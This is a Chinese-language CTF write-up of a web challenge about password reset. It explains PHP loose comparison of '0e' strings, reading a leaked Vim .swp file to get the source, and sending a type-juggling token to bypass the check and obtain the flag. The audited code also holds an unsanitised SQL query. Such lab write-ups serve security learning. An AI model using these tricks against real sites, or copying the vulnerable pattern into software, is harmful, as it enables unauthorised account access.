首先是PHP的基本知识了解,如下:
PHP代码:
<?php
$a=1e+3;
$b='1e3';
$c=1e-1;
var_dump($a);
var_dump($b);
var_dump($c);
?>
输出
float(1000)
string(3) "1e3"
float(0.1)
PHP代码
<?php
$d='0e11111111';
if($d != '0'){
echo "no";
}
else {
echo "yes";
}
?>
输出
yes
开始解题
首先看http://ctf5.shiyanbar.com/10/upload/step1.php的页面代码
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="renderer" content="webkit" />
<meta name="admin" content="[email protected]" />
<meta name="editor" content="Vim" />
</head>
<body>
<form action="./step1.php" method="GET">
<h1>找回密码step1</h1>
input regist email:<input name="emailAddress" type="text" /></br>
<input type="submit" value="提交">
</form>
</body>
</html>
当我们输入一个邮箱,提交时,查看response
<script>alert("你邮箱收到的重置密码链接为 ./[email protected]&check=???????")</script> <title>logic</title>
所以我们继续访问step2.php
http://ctf5.shiyanbar.com/10/upload/[email protected]&check=12345
查看response,发现页面代码中有一个表单指向submit.php:
<form action="submit.php" method="GET">
<h1>找回密码step2</h1>
email:<input name="emailAddress" type="text" <br />
<b>Notice</b>: Use of undefined constant email - assumed 'email' in <b>C:\h43a1W3\phpstudy\WWW\10\upload\step2.php</b> on line <b>49</b><br />
value="[email protected]" disable="true"/></br>
token:<input name="token" type="text" /></br>
<input type="submit" value="提交">
</form>
继续
http://ctf5.shiyanbar.com/10/upload/[email protected]&token=123
页面显示:you are not an admin
回到上面step1.php和step2.php的页面代码中:
<meta name="admin" content="[email protected]" />
<meta name="editor" content="Vim" />
那我们把[email protected]放进去
[email protected]&token=123
此时页面变化fail
那问题在token上了,在看前面的页面代码
<meta name="editor" content="Vim" />
vim编辑器异常退出,会产生一个.submit.php.swp的文件,访问这个文件
http://ctf5.shiyanbar.com/10/upload/.submit.php.swp
获得部分代码,开始代码审计:
if(!empty($token)&&!empty($emailAddress)){
if(strlen($token)!=10) die('fail');
if($token!='0') die('fail');
$sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
$r = mysql_query($sql) or die('db error');
$r = mysql_fetch_assoc($r);
$r = $r['num'];
if($r>0){
echo $flag;
}else{
token要长度为10,并且等于’0’,那设计如下(参考最开始的PHP基础知识部分)
token=0e11111111
最后payload
[email protected]&token=0e11111111
成功拿到flag
flag is SimCTF{*******}
最后提交的时候,注意审题:
格式:SimCTF{ }